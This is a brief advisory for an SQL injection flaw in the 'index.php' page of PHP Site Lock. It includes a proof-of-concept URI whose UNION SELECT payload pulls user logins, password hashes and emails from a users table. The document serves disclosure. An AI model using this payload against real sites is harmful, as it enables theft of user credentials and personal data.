PHP Site Lock 'index.php' SQL Injection Vulnerability

PHP Site Lock 'index.php' SQL Injection Vulnerability

An attacker can exploit these issues via a browser.

The following proof-of-concept URI is available:

http://www.example.com/index.php?page=show_article&articleid=-1+union+select+concat_ws(0x3a3a,user_login,user_pass,user_email),2,3,4,5+from+wp_users/*